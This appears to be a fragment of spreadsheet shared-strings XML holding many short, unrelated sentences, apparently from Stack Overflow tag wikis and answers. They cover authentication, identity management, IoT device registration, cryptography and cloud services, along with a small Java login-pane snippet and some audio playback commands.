Additionally JXLoginPane offers two actions available through its action map, giving the developers the ability to create their own login interface:
JXLoginPane loginPane = new JXLoginPane();
Action loginAction = loginPane.getActionMap().get(JXLoginPane.LOGIN_ACTION_COMMAND);
Action cancelAction = loginPane.getActionMap().get(JXLoginPane.LOGIN_ACTION_CANCEL_LOGIN_ACTION_COMMAND);
JButton loginButton = new JButton(loginAction);
JButton cancelButton = new JButton(cancelButton);
...</t>
  </si>
  <si>
    <t>Nuclide
http://nuclide.io/
A unified developer experience for web and mobile development, built as a suite of packages on top of Atom to provide hackability and the support of an active community.</t>
  </si>
  <si>
    <t>Pay for any goods and services using the payment service can be a variety of ways at a convenient time for you, with cash coming into your personal account over a secure connection almost instantly.</t>
  </si>
  <si>
    <t>Once a store becomes a Google Trusted Store then a badge is displayed on the site via a javascript integration and customers are prompted at check-out to opt-in for order protection and to rate their experience with the retailer.</t>
  </si>
  <si>
    <t>The implicit assumption in this view is that services created as part of SOA solutions are just one more type of IT asset in need of governance, with the corollary that SOA governance does not apply to IT assets that are "not SOA".</t>
  </si>
  <si>
    <t>This term is broadly used to cover issues such as how users are given an identity, the protection of that identity, and the technologies supporting that protection (e.g., network protocols, digital certificates, passwords, etc.)</t>
  </si>
  <si>
    <t>The Google Admin SDK allows developers to write applications to manage Google Apps domains, migrate from and integrate with existing IT infrastructure, create users, update settings, audit activity, and more.</t>
  </si>
  <si>
    <t>It is also the basis to provide client auditing and policy services for centralised identity management systems such as FreeIPA and Active Directory.</t>
  </si>
  <si>
    <t>RSA Authentication Manager is an on-premise multi-factor authentication solution that verifies authentication requests and centrally administers authentication policies for enterprise networks.</t>
  </si>
  <si>
    <t>My practice is this:
I will have a "Registration Function" embedded in UWP apps for RPi3, when the apps start, it will detect if the devicekey is save locally or not, if not it will initialized the registration process, else it continue what it should be doing.</t>
  </si>
  <si>
    <t>GPIO controller can not shared across multiple app domain, once an app handles the GPIO controller, it will be locked for current app domain.</t>
  </si>
  <si>
    <t>Gluu's open source authentication &amp; API access management software for securing Web &amp; mobile applications using OAuth2.</t>
  </si>
  <si>
    <t>With multi-platform API Stormpath provides a common role-based access control &amp; authentication framework that can be used across disparate applications and multiple programming languages.</t>
  </si>
  <si>
    <t>See An overview of Windows 10 IoT Enterprise:
Windows 10 IoT Enterprise is a full version of Windows 10 that
  delivers enterprise manageability and security to IoT solutions.</t>
  </si>
  <si>
    <t>PingFederate from Ping Identity is cloud identity management software for Single Sign-On (SSO), secure mobile access, automated user provisioning and API security.</t>
  </si>
  <si>
    <t>One of the big advantages of using Cloud IoT Core is that it handles the security piece so you don't have to think about that part.</t>
  </si>
  <si>
    <t>Essentially, I would like to use Stackdriver to monitor my devices but rather than deploy the agent to all of them I could leverage the existing and secure connection that exists because they are connected to IoT Core.</t>
  </si>
  <si>
    <t>Honestly speaking the data transfers by means of ssh is not an elegant solution in your case.</t>
  </si>
  <si>
    <t>Not a perfect solution per your spec, but managing lock files can be complicated.</t>
  </si>
  <si>
    <t>Of course you can implement your own IoT hub on any web application and cloud (or on-prem) platform, there is nothing secret or proprietary in those solutions.</t>
  </si>
  <si>
    <t>On modern UNIX-like systems it is replaced with more secure and flexible SSH protocol.</t>
  </si>
  <si>
    <t>JWT is architected as a method for transferring security "claims based" between parties.</t>
  </si>
  <si>
    <t>Istio is an open platform that provides a uniform way to connect, manage, and secure microservices.</t>
  </si>
  <si>
    <t>HP Server Automation provides a single solution for OS Provisioning, Security Patch Management, Audit and Compliance, Software deployment, configuration management, across Windows, Linux, Unix and covering both physical and virtual platforms.</t>
  </si>
  <si>
    <t>Where RBAC focuses on the user, its role(s), permissions, and optionally group(s) to define authorization logic, ABAC uses attributes and policies to define access control logic.</t>
  </si>
  <si>
    <t>MarkLogic is the trusted enterprise NoSQL platform for Big Data applications to drive revenue, streamline operations, manage risk, and make the world safer.</t>
  </si>
  <si>
    <t>The system produces an integrated label image, complete with (stealth) postage, verified delivery/return addresses, and service barcodes (Delivery Confirmation, Signature Confirmation, Certified Mail, Express Mail, Confirm Services, or customs numbers).</t>
  </si>
  <si>
    <t>The second way I thought of was storing the files in an encrypted container an synchronizing the container, but with every little change the whole file would have to be uploaded to the rpi.</t>
  </si>
  <si>
    <t>I have seen Logic apps is an option but how to implement it with multiple user account and devices.</t>
  </si>
  <si>
    <t>I was able to add a Device Information service (UUID 180a) for both service registration and advertising.</t>
  </si>
  <si>
    <t>A simple communication protocol used is just add a device address before every command.</t>
  </si>
  <si>
    <t>For simple applications you can use the time() value for seeding into srand, however for more secure applications you should find something to seed with that cannot easily be guessed.</t>
  </si>
  <si>
    <t>The GT511C3 can store 200 instead of 20 fingerprints and has an faster identification time (0.5s faster).</t>
  </si>
  <si>
    <t>You must also note that although this is very simple to implement, and you'll find all the necessary code online, it is far from secure.</t>
  </si>
  <si>
    <t>But, because registration id is provided as the subject name of the certificate, so CN need follow rules of registration id:
The registration ID is alphanumeric, lowercase, and may contain hyphens.</t>
  </si>
  <si>
    <t>ENet provides a relatively thin, simple and robust network communication layer on top of UDP.</t>
  </si>
  <si>
    <t>SSLV3 is the Secure Sockets Layer ([tag:SSL]) Version 3, are cryptographic protocols that provide communication security over the Internet.</t>
  </si>
  <si>
    <t>Network protocols which allow automatic detection of devices and services offered by these devices on a computer network.</t>
  </si>
  <si>
    <t>Couchbase Lite is an ultra-lightweight, reliable, secure JSON database built for online/offline mobile application needs and is part of Couchbase's Mobile product.</t>
  </si>
  <si>
    <t>Authorization determines whether an identity should be granted access to a specific resource.</t>
  </si>
  <si>
    <t>thttpd is a simple, small, portable, fast, and secure HTTP server.</t>
  </si>
  <si>
    <t>Socialite is a package that provides a simple, convenient way to authenticate with OAuth providers within the Laravel framework.</t>
  </si>
  <si>
    <t>Identity Toolkit is a complete authentication service for any site or app.</t>
  </si>
  <si>
    <t>A password-storage application, and its associated APIs and SDKs, for various mobile and desktop platforms.</t>
  </si>
  <si>
    <t>PayTM also provides payment solution for Stores for accepting payment from customers.</t>
  </si>
  <si>
    <t>It is able to link a variety of different identities to a single account so that you can know you are communicating with the person you think you are.</t>
  </si>
  <si>
    <t>It offers monitoring and alerting services for servers, switches, applications and services.</t>
  </si>
  <si>
    <t>Clearance is a Ruby gem for authenticating users with email and password in Rails apps.</t>
  </si>
  <si>
    <t>Django-registration is a pluggable django app designed to make allowing user signups as painless as possible.</t>
  </si>
  <si>
    <t>AdWords API v201109 is a collection of web services that you can use to build applications that manage AdWords accounts and their associated campaign data.</t>
  </si>
  <si>
    <t>Credentials in cryptography establish the identity of a party to communication.</t>
  </si>
  <si>
    <t>IAM also enables identity federation between your corporate directory and AWS services.</t>
  </si>
  <si>
    <t>All of this beside the, standard, programmatic registration as detailed in the HTTP Service specs.</t>
  </si>
  <si>
    <t>Desktop, desktop device, and Windows Store apps can be certified; however, plug-in, ActiveX, and other web apps cannot be certified.</t>
  </si>
  <si>
    <t>The minFraud service is used to screen over 40 million e-commerce transactions and account registrations a month.</t>
  </si>
  <si>
    <t>This specification defines a contract between J2EE containers and authorization providers.</t>
  </si>
  <si>
    <t>Access control lists are a way to manage application permissions in a fine-grained, yet easily maintainable and manageable way.</t>
  </si>
  <si>
    <t>Tag for the two standart protocols for secured connection transfers (approved by IETF).</t>
  </si>
  <si>
    <t>The privacy goal is motivated by the fact that the identity provider does not know which website the user is identifying.</t>
  </si>
  <si>
    <t>From the orbot homepage, "Orbot is a free proxy app that empowers other apps to use the internet more securely.</t>
  </si>
  <si>
    <t>Coinbase is an online platform for buying, selling, transferring, and storing digital currency.</t>
  </si>
  <si>
    <t>Adobe Sign (formerly Adobe Document Cloud eSign services) APIs allow developers to build applications that integrate with Adobe Sign.</t>
  </si>
  <si>
    <t>This is the only way to delete the key pairs and for other resources has the advantage that it is impossible to delete the resources of other users because the lack of permissions.</t>
  </si>
  <si>
    <t>Azure Key Vault helps safeguard cryptographic keys and secrets used by cloud applications and services.</t>
  </si>
  <si>
    <t>App ID supports authentication using social identity providers, so that users can log-in with their existing Facebook and Google accounts.</t>
  </si>
  <si>
    <t>SSL/TLS certificates
  are used to secure network communications and establish the identity
  of websites over the Internet.</t>
  </si>
  <si>
    <t>It also allows you to manage all your users using local password or an external identity provider (e.g.</t>
  </si>
  <si>
    <t>That means all interactions can be personalized based on data, processed securely across touchpoints, and delivered in an elegant user experience.</t>
  </si>
  <si>
    <t>This third developer preview focuses on three areas: performance, security and productivity.</t>
  </si>
  <si>
    <t>SSL/TLS certificates are used to secure network communications and establish the identity of websites over the Internet.</t>
  </si>
  <si>
    <t>Authenticators use attestation to provide cryptographic proof of their
  properties to the relying party.</t>
  </si>
  <si>
    <t>Private cloud
The services and infrastructure are maintained on a private network.</t>
  </si>
  <si>
    <t>The SSO Agent helps secure access to SaaS and on-premise web applications for users, with authentication methods for multifactor identity assurance.</t>
  </si>
  <si>
    <t>Google has introduced Google Play App Signing service that allows you to store your app signing keys on Google's servers.</t>
  </si>
  <si>
    <t>If you still have Backup vaults, they are being auto-upgraded to Recovery Services vaults.</t>
  </si>
  <si>
    <t>Firebase Assistant offers a simple way to connect your app to Firebase's cloud services such as authentication and Realtime Database.</t>
  </si>
  <si>
    <t>SHA-1 is the most widely used of the existing SHA hash functions, and is employed in several widely-used security applications and protocols.</t>
  </si>
  <si>
    <t>It allows developers to implement Trusted Applications (TAs) running on Arm Trustzone technology.</t>
  </si>
  <si>
    <t>It includes decentralized identity, support communications and provides a permissions framework.</t>
  </si>
  <si>
    <t>A sign-in controller that enables users to authenticate with your application by signing in through a service provider.</t>
  </si>
  <si>
    <t>Internet Information Services (IIS) 8.5 in Windows Server 2012 R2 provides a secure, easy-to-manage, modular and extensible platform for reliably hosting.</t>
  </si>
  <si>
    <t>AzMan (Windows Authorization Manager) is a role-based access control (RBAC) framework that provides an administrative tool to manage authorization policy and a runtime that allows applications to perform access checks against that policy.</t>
  </si>
  <si>
    <t>From the website:
Winpdb is a platform independent GPL Python debugger with support for multiple threads, namespace modification, embedded debugging, encrypted communication and is up to 20 times faster than pdb.</t>
  </si>
  <si>
    <t>The IBM API Management for Bluemix service enables API owners to define, secure, control, and publish APIs to developer communities, as well as to analyze API usage.</t>
  </si>
  <si>
    <t>Developers can get a unique Developer ID from Apple and use it to digitally sign their apps.</t>
  </si>
  <si>
    <t>At manufacture, I would imagine at the manufacture facility the (contract) manufacturer calls the API using delegated credentials to send Google the public key and then securely installs the private key on device.</t>
  </si>
  <si>
    <t>In cryptography, RC4 (also known as ARC4 or ARCFOUR meaning Alleged RC4, see below) is the most widely used software stream cipher and is used in popular protocols such as Transport Layer Security (TLS) (to protect Internet traffic) and WEP (to secure wireless networks).</t>
  </si>
  <si>
    <t>It differs from the other emerging API servers by taking an opinionated stance on the full implementation of API by being operationally sound and simple to deploy, by delivering built-in security with JSON Web Tokens plus database roles, and by fully embracing the relational model.</t>
  </si>
  <si>
    <t>References
OAuth 2.0 for Web Server Applications
OAuth 2.0 for Installed Applications
OAuth 2.0 for Client-side Applications
OAuth 2.0 for Devices
OAuth 2.0 for Server to Server Applications
Cross-client Identity
Useful links
Google OAuth 2.0 Playground
Migrate from OAuth 1.0 to OAuth 2.0
Unofficial support forums:
Google OAuth2 Google+ community</t>
  </si>
  <si>
    <t>On the other side, developers that want to publish their cloud API to the public, or internally in private/partner mode, can use all the tools provided by Mashape to handle authentication, users, analytics and billing.</t>
  </si>
  <si>
    <t>Crystal Server's Getting Started Guide describes Crystal Server as:
[..] an entry-level BI solution that enables you to securely open,
  view, interact with and share reports and dashboards over the Web.</t>
  </si>
  <si>
    <t>Useful links
Getting access to external storage
Checking media availability
Saving files that can be shared with other apps
Saving files that are app-private
Saving cache files</t>
  </si>
  <si>
    <t>Fine grained authorization to do a specific action and/or operation with Hadoop component/tool and managed through a central administration tool
Standardize authorization method across all Hadoop components.</t>
  </si>
  <si>
    <t>In recent times the project has been resurrected and resides at: https://github.com/ubernostrum/django-registration
The original objective of the django-registration was to be a 
pluggable django app designed to make allowing user signups as
  painless as possible.</t>
  </si>
  <si>
    <t>Windows 10 IoT Enterprise is a full version of Windows 10 that delivers enterprise manageability and security to IoT solutions.</t>
  </si>
  <si>
    <t>Key Management Interoperability Protocol (KMIP) is an OASIS defined binary communication protocol for communicating between enterprise key management systems and encryption systems.</t>
  </si>
  <si>
    <t>You use AWS Identity and Access Management (IAM) policies and principals to control SSH access to instances, removing the need to share and manage SSH keys.</t>
  </si>
  <si>
    <t>It was designed to be fully compatible with the Erlang platform and is well suited to writing fault-tolerant, distributed applications with soft real-time guarantees and the ability for hot-code-swapping.</t>
  </si>
  <si>
    <t>It promotes distributed and decentralized topologies without single points of failure, enabling fault tolerance and high availability coupled with a reliable message delivery guarantee.</t>
  </si>
  <si>
    <t>Certificates are commonly used in Secure Socket Layer (SSL), code signing and identity management systems like smartcards.</t>
  </si>
  <si>
    <t>Cryptography (from the Greek for "secret/hidden writing") is the practice and study of techniques for secure communication and processing in the presence of third parties.</t>
  </si>
  <si>
    <t>Here is a small sample how easy you can login to an XMPP server and send a simple chat-message to another user:
Features:
cross platform, designed for:
Microsoft .NET Framework
Microsoft .NET Compact Framework (Pocket PC, Smartphone, Windows CE)
Mono
Portable .NET
compatible with .NET 1.1 and .NET 2.0
Multi OS (Windows, Linux, Mac)
for client, server and web applications
fast and lightweight
uses its own simple and fast XML-Parser
open source</t>
  </si>
  <si>
    <t>QNAP is a Taiwanese corporation that specializes in providing networked solutions for file sharing, virtualization, storage management and surveillance applications to address corporate, SMB, SOHO and home user needs.</t>
  </si>
  <si>
    <t>Apache Syncope is an Open Source system for managing digital identities in enterprise environments, implemented in Java EE technology and released under Apache 2.0 license.</t>
  </si>
  <si>
    <t>The company primarily offers domain name registration in most major national and global top-level domains.</t>
  </si>
  <si>
    <t>The official overall goals of this LTS version are:
Smooth Migration
User Happiness
Robust and Secure Foundation
Modern Technologies/ Interoperability
Further Information
TYPO3 CMS 6.2 LTS Release Notes
Wikipedia
Roadmap</t>
  </si>
  <si>
    <t>With Yarn, engineers still have access to the npm registry, but can install packages more quickly and manage dependencies consistently across machines or in secure offline environments.</t>
  </si>
  <si>
    <t>Here are some of the benefits PhoneGap Build provides:
Managed Compilation and Signing (No SDKs)
Multiple Supported Platforms
Work With Your Team
Quicker Development Cycle</t>
  </si>
  <si>
    <t>Since the secure daemon is already interfacing with the TPM for device registration etc.</t>
  </si>
  <si>
    <t>This allows you to reuse the same identity across multiple devices for the same customer, which is more keeping with how Cognito works.</t>
  </si>
  <si>
    <t>Also, Lite offers instant email account access.</t>
  </si>
  <si>
    <t>Using registration-free activation for your assemblies instead of registering them during deployment offers two advantages:
You can control which DLL version is activated when more than one version is installed on a computer.</t>
  </si>
  <si>
    <t>Double check the AWS account number if you're using multiple accounts.</t>
  </si>
  <si>
    <t>It gives you access to a secure, dedicated Redis cache, managed by Microsoft and accessible from any application within Azure.</t>
  </si>
  <si>
    <t>ShareFile is a secure content collaboration and file sharing solution, oriented at businesses.</t>
  </si>
  <si>
    <t>Twig is a modern, fast, flexible, and secure templating engine for PHP.</t>
  </si>
  <si>
    <t>SSLV3 is the Secure Sockets Layer (ssl) Version 3, are cryptographic protocols that provide communication security over the Internet.</t>
  </si>
  <si>
    <t>The Intel Edison module includes a device-to-device and device-to-cloud    connectivity framework to enable cross-device
  communication and a    cloud-based, multi-tenant, time-series
  analytics service.</t>
  </si>
  <si>
    <t>They don't let you run real VMs, but only wrap a container in new layer providing some kind of security boundary (or sandbox).</t>
  </si>
  <si>
    <t>Generally speaking, what goes into a centralized system like Subversion is much more strictly controlled because it is harder to undo; most commits in a centralized system involve running a project's entire test suite.</t>
  </si>
  <si>
    <t>so each particular service would generate a key pair and share it with a group of devices linked to the service.</t>
  </si>
  <si>
    <t>I'm currently working on getting a Leonardo device recognized and communicating with my app over a serial port in C# for the Windows 8 App Store.</t>
  </si>
  <si>
    <t>Is the missing authorization something which is expected to be provided by this virgin device which is trying to register itself, or is it some service-to-service thing?</t>
  </si>
  <si>
    <t>What you are looking for is the Google OAuth 2.0 flow for devices (see the section on Calling a Google API):
Using OAuth 2.0 for Devices
https://developers.google.com/accounts/docs/OAuth2ForDevices</t>
  </si>
  <si>
    <t>Ethernet) is not a shared-medium protocol and cannot detect TX collisions (when two devices try to talk at the same time).</t>
  </si>
  <si>
    <t>If by SFTP you mean Secure File Transfer Protocol (SFTP) you need an SSH implementation (and rather similar cryptographic primitives).</t>
  </si>
  <si>
    <t>One reason for the issue is not having the correct certificate in the IoT_Home/conf/identity/identity-providers/iot_default.xml.</t>
  </si>
  <si>
    <t>The error thrown suggests the service isn't authorized or have the delegated permissions to write to the designated blob container.</t>
  </si>
  <si>
    <t>Cloud IoT Core is a bridge designed to securely manage large fleets of devices and authenticate them with your cloud project.</t>
  </si>
  <si>
    <t>My suggestion is to use Azure IoT Edge as a gateway to complete Identity translation and protocol translate.</t>
  </si>
  <si>
    <t>If we look at the OSI ISO 7 layer model for network communication we can see that the Media Access Control (MAC) address is vital for identifying which device is which within a wifi network.</t>
  </si>
  <si>
    <t>Applications that do not require reliable data stream service may use the User Datagram Protocol (UDP), which provides a connectionless datagram service that emphasizes reduced latency over reliability.</t>
  </si>
  <si>
    <t>On-premises managed instances (which is what a Raspberry is after it's registered) are not supported by Session Manager today.</t>
  </si>
  <si>
    <t>Realistically speaking, you can probably assume an internal network is safe enough for inconsequential internal services, if physical and wireless access is adequately controlled.</t>
  </si>
  <si>
    <t>Android Pay (formerly Google Wallet) is a virtual representation of your wallet securely stored in the cloud.</t>
  </si>
  <si>
    <t>"Android keystore" may also refer to Android Keystore System, introduced in API level 18, which allows storing cryptographic keys securely within an app.</t>
  </si>
  <si>
    <t>Cydia Substrate is a framework that allows third party developers to provide run-time patches to system functions on mobile devices.</t>
  </si>
  <si>
    <t>It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.</t>
  </si>
  <si>
    <t>Orbot is a free Android app that enables other apps to browse the internet more securely.</t>
  </si>
  <si>
    <t>The kraken suite is a secure and scalable layer that extends express by providing structure and convention.</t>
  </si>
  <si>
    <t>The core storage system is designed to provide a secure, network-accessible way to store an unlimited number of files.</t>
  </si>
  <si>
    <t>RESTful security tag groups all posts related to securing REST applications</t>
  </si>
  <si>
    <t>JSON Web Token (JWT) is a compact, URL-safe means of representing claims to be transferred between two parties.</t>
  </si>
  <si>
    <t>App Envoy is a home and lock screen, push messaging solution for app developers.</t>
  </si>
  <si>
    <t>Taxamo's platform enables e-service providers to outsource the development and maintenance of the EU VAT compliance.</t>
  </si>
  <si>
    <t>DotNetOpenAuth is an open source library for OpenID 1.1 and 2.0 supporting OAuth 1.0, 1.1, 2.0 as Consumer and Service Provider.</t>
  </si>
  <si>
    <t>The Windows Identity Foundation is a free Microsoft library that enables claims based authentication and use federated identity/single sign-on in their applications.</t>
  </si>
  <si>
    <t>Before your app can integrate app services, be installed on a device, or be submitted to the App Store, it must be signed with a certificate issued by Apple.</t>
  </si>
  <si>
    <t>Secrets Manager helps protect access to IT resources and data by rotating and managing access to secrets.</t>
  </si>
  <si>
    <t>MCP is a e-commerce payment solution that is simple to integrate and get started with online payment.</t>
  </si>
  <si>
    <t>A zero-knowledge proof is a means by which one party can prove the truth of a statement to another party without making anything else known.</t>
  </si>
  <si>
    <t>SSH File Transfer Protocol, a network protocol designed to provide secure file transfer and manipulation facilities over SSH (Secure Shell protocol).</t>
  </si>
  <si>
    <t xml:space="preserve"> is an implementation of per object permissions [1] on top of Django's authorization backend,
Online documentation is available at https://django-guardian.readthedocs.io/.</t>
  </si>
  <si>
    <t>Magento handles all of the software, servers, hosting and security so customer can focus on growing online business.</t>
  </si>
  <si>
    <t>For instance, Symfony2 provides a layer that checks if the user is fully authorized or if it has some expected roles.</t>
  </si>
  <si>
    <t>There's also some less used authentication providers like GitHub or Amazon supplied but anyone can take advantage of the api and create your own provider extension.</t>
  </si>
  <si>
    <t>A secure socket layer (SSL) (or TSL) connection is set up between an SDN controller and the OF device.</t>
  </si>
  <si>
    <t>By eschewing backward compatibility, in contrast to Drawbridge, unikernels address cloud services rather than desktop applications.</t>
  </si>
  <si>
    <t>This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.</t>
  </si>
  <si>
    <t>Such clients do not have ability to protect a shared secret, hence there is not secret shared.</t>
  </si>
  <si>
    <t>JSON Web Token (JWT) is a compact, URL-safe means of representing
   claims to be transferred between two parties.</t>
  </si>
  <si>
    <t>The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software.</t>
  </si>
  <si>
    <t>App Envoy is a home and lock screen push messaging solution for app developers.</t>
  </si>
  <si>
    <t>Products marketed as terminal servers can be very simple devices that do not offer any security functionality, such as data encryption and user authentication.</t>
  </si>
  <si>
    <t>For information about privacy, please see the Google Privacy Policy and the Chrome Privacy Policy.</t>
  </si>
  <si>
    <t>The API is based on RESTful principles, is secured by OAuth 2.0, and provides JSON messages, search, pagination, sorting, and filtering.</t>
  </si>
  <si>
    <t>Conceptually, one or more credentials are stored on an
  authenticator, and each credential is scoped to a single Relying
  Party.</t>
  </si>
  <si>
    <t>It is intuitive, fast and secure template engine, which helps to build better websites easily.</t>
  </si>
  <si>
    <t>JWT is a compact, URL-safe means of representing claims to be transferred between two parties.</t>
  </si>
  <si>
    <t>Connecting RSA Authentication Manager and the SSO Agent
You can connect RSA Authentication Manager and the SSO Agent in the following ways:
Users can use RSA SecurID as a step-up authentication method for SaaS and on-premise web applications.</t>
  </si>
  <si>
    <t>With Container-Optimized OS, you can bring up your Docker containers on Google Cloud Platform quickly, efficiently, and securely.</t>
  </si>
  <si>
    <t>It provides a simple and unified API to access dozens of different payment gateways with very different internal APIs.</t>
  </si>
  <si>
    <t>AWS Amplify provides the greatest common denominators for mobile backends, including authentication, analytics, notifications, storage, and offline realtime database AWS AppSync.</t>
  </si>
  <si>
    <t>OmiseGO is a subsidiary of Omise, a leading online payment gateway service provider operating in Southeast Asia.</t>
  </si>
  <si>
    <t>The CGM securely stores your credentials in the Windows Credential Manager so you only need to enter them once for each remote repo you access.</t>
  </si>
  <si>
    <t>The Directive gave individuals rights to refuse the use of cookies that reduce their online privacy.</t>
  </si>
  <si>
    <t>This usually requires that the authorization authority know and understand the users identity and their membership in various groups or roles.</t>
  </si>
  <si>
    <t>Or, the insert, delete and update commands could be executed within simple functions like registeruser or loginuser stored within the data access layer.</t>
  </si>
  <si>
    <t>We could use Active sync but there are few problems with it:
- WinCE 6.0 is not working with WMDC (drivers on device just crash after connecting device with PC) and I didn't find any solution for it so in this case we need to use WinXP on PC side (old ActiveSync) 
- we need to filter communication with active sync to only our application, no other non authorized software should be allowed (what I know this is imposible to obtain).</t>
  </si>
  <si>
    <t>Save this GUID on our database (On user registration)
3. call getOpenIdTokenForDeveloperIdentity with our GUID (On user registration)
4. when the app wants to send a message, she does an API request our service and the server creates the token with the assumeRole call.</t>
  </si>
  <si>
    <t>Based on your use-case, follow these instructions to connect the devices to IoT Central: 
Connect a single device quickly (using Shared Access Signatures)
Connect devices at scale using Shared Access Signatures (SAS) 
Connect devices at scale using X509 certificates recommended for production workloads
Connect without first registering devices</t>
  </si>
  <si>
    <t>The Mercurial Keyring extension uses services of the keyring library to securely save authentication passwords (HTTP/HTTPS and SMTP) using system specific password database (Gnome Keyring, KDE KWallet, OSXKeyChain, dedicated solutions for Win32 and command line).</t>
  </si>
  <si>
    <t>It is a term that refers to one of the basic mechanisms used by protocols operating over a packet switched computer network to provide reliable communication (such as that provided by a reliable byte stream, for example TCP).</t>
  </si>
  <si>
    <t>Ably is the only globally distributed pub/sub platform to provide websocket support and open protocol support, with low latencies (mean 65ms), guaranteed ordering, and continuity of service over unreliable networks.</t>
  </si>
  <si>
    <t>For example, often software developers hired by a company sign NDAs by which they agree not to disclose information about the project or about the technologies on which they will be working.</t>
  </si>
  <si>
    <t>CyberDuck is a filesystem client that provides unified access to FTP, SFTP, WebDAV, Amazon S3, Google Cloud Storage, Windows Azure, Rackspace Cloud Files, and Google Drive accounts.</t>
  </si>
  <si>
    <t>For question regarding the privacy rules and policies of used applications, frameworks, APIs, and services.</t>
  </si>
  <si>
    <t>Game developers and third party software developers have created technologies that attempt to prevent cheating.</t>
  </si>
  <si>
    <t>Another major advantage is related to complex designs, which can be managed and verified easily.</t>
  </si>
  <si>
    <t>The major areas of improvement are:
LE Data Packet Length Extension
LE Secure Connections
Link Layer Privacy
Link Layer Extended Scanner Filter Policies
IP connectivity for Bluetooth Smart devices to become available soon after the introduction of BT v4.2 via the new Internet Protocol Support Profile (IPSP).</t>
  </si>
  <si>
    <t>Synonym of apache-syncope, an Open Source system for managing digital identities in enterprise environments, implemented in JEE technology and released under Apache 2.0 license.</t>
  </si>
  <si>
    <t>Apache Syncope is an Open Source system for managing digital identities in enterprise environments, implemented in JEE technology and released under Apache 2.0 license.</t>
  </si>
  <si>
    <t>Amazon WorkDocs is a secure, managed, document collaboration and management service.</t>
  </si>
  <si>
    <t>In other words, service identities are credentials that are configured globally for the Access Control namespace that allow applications or clients to authenticate directly with ACS and receive a token.</t>
  </si>
  <si>
    <t>key_mgmt=WPA-PSK defines that WPA pre-shared key management protocol will be used.</t>
  </si>
  <si>
    <t>The Azure IoT Hub Identity Registry is what manages devices identities.</t>
  </si>
  <si>
    <t>Live SDK provides a set of controls and APIs that enable applications to integrate single sign-on (SSO) with Microsoft accounts and access information from SkyDrive and Outlook.com on Windows Phone and Windows 8.</t>
  </si>
  <si>
    <t>A unified REST API and programmability model enabling developers to take advantage of the tremendous amount of data in Office 365, Enterprise Mobility + Security and Windows 10, to build smarter apps and help people achieve more.</t>
  </si>
  <si>
    <t>IBM API Management enables API owners to define, secure, control, and publish APIs to developer communities, as well as to analyze API usage.</t>
  </si>
  <si>
    <t>Watson IoT platform in IBM Bluemix platform is capable of manage devices and update the firmware.</t>
  </si>
  <si>
    <t>Connect to any service and unlock your data - Connect your web or mobile app to enterprise systems or SaaS in minutes with built-in connectors.</t>
  </si>
  <si>
    <t>It allows developer to sign, encrypt, decrypt, and verify any kind of text - in particular e-mails - as well as managing keys.</t>
  </si>
  <si>
    <t>Having the secure information stored in the TPM can help protect them from disclosure.</t>
  </si>
  <si>
    <t>django-guardian is an implementation of per object permissions on top of Django's authorization backend</t>
  </si>
  <si>
    <t>A Certification Authority(CA) is a trusted third party which asserts the identity of a remote website.</t>
  </si>
  <si>
    <t>KNOX Workspace offers multiple-layered protection from the device down to the kernel with two-factor bio-metric authentication for authorized device access.</t>
  </si>
  <si>
    <t>Windows Azure Active Directory Access Control is also used to handle authentication in Windows Azure Service Bus.</t>
  </si>
  <si>
    <t>It helps you to have certain data sequestered based on account or company, but still allow some data to exist in a common tenant.</t>
  </si>
  <si>
    <t>Tower allows you to control access to who can access what, even allowing sharing of SSH credentials without someone being able to transfer those credentials.</t>
  </si>
  <si>
    <t>You can connect a wide variety of devices and gateway devices and Watson IoT Platform provides secure communication to and from your devices by using MQTT and TLS.</t>
  </si>
  <si>
    <t>Features:
Multi service with cloud self awareness
Multi project, environment, and configuration
Input Mapping, Formatting, and Validation (IMFV)
Security: oAuth, device and geo
Multitenancy &amp; productization
User Registration &amp; Access Control (URAC)
Admin &amp; maintenance dashboard
Related links:
GitHub Repository
Website
SOAJS on NPM</t>
  </si>
  <si>
    <t>However, newer iOS devices (iPhone 4S, new iPad) are capable of Bluetooth 4.0 LE communication with external devices without the need for those devices to be MFi-compliant.</t>
  </si>
  <si>
    <t>Cloud IAM unifies access control for Cloud Platform services into a single system and presents a consistent set of operations.</t>
  </si>
  <si>
    <t>JOpenID can be used in a web site to enable users to sign on using their OpenID account without registration.</t>
  </si>
  <si>
    <t>It was
  built to help companies secure their networks by proactively testing
  all their hosts and networking devices for poor passwords.</t>
  </si>
  <si>
    <t>Since Access Control is normally based on the identity of the User who requests access to a resource, Authentication is essential to effective Security.</t>
  </si>
  <si>
    <t>In ASP.NET, there are two ways to authorize access to a given resource:
File authorization
File authorization is performed by the
FileAuthorizationModule.</t>
  </si>
  <si>
    <t>It helps deliver and receive messages across platforms reliably and reduce friction with robust authentication.</t>
  </si>
  <si>
    <t>the cost of locking a resource exceeds the time taken in the protected operation.</t>
  </si>
  <si>
    <t>Cloud Storage for Firebase (previously called Firebase Storage) gives developers robust, secure uploads and downloads from Firebase SDKs by handling network interrupts and providing an intuitive authorization model.</t>
  </si>
  <si>
    <t>It is designed to be a self-service platform and his web-based provides:
User API: built-in support for logging in with email and password; OAuth  login providers such as Facebook, Google, Twitter and GitHub; and single-session anonymous login.</t>
  </si>
  <si>
    <t>It has a simple design aimed at the highest memory filling rate and effective use of multiple computing units, while still providing defense against tradeoff attacks (by exploiting the cache and memory organization of the recent processors).</t>
  </si>
  <si>
    <t>The pseudocode I've thought up is:
I consider this solution a starting point, because I think a solution involving interrupts would be a better solution.</t>
  </si>
  <si>
    <t>Here I verified SSL is working for HTTPS:
But when I tried both non-secure websocket and secure websocket, only non-secure websocket worked.</t>
  </si>
  <si>
    <t>2 terminal ssh windows to your stretch raspberry pi 3B+
first window:
sudo /usr/bin/mpg123 -q -a hw:0,0 /media/musicfile1.mp3   #(now hear music ok)
second window:
sudo /usr/bin/mpg123 -q -a hw:0,0 /media/musicfile2.mp3   #(now hear music ok)
Now stop the first window music and try restarting it.</t>
  </si>
  <si>
    <t>I set up a secure GATT server similar to the Secure Gatt Server Example with a custom service with Man in the Middle (MITM) based encryption.</t>
  </si>
  <si>
    <t>Created an identity pool with permission to all users to do all actions on the resources 
1. create GUID (On user registration)
2.</t>
  </si>
  <si>
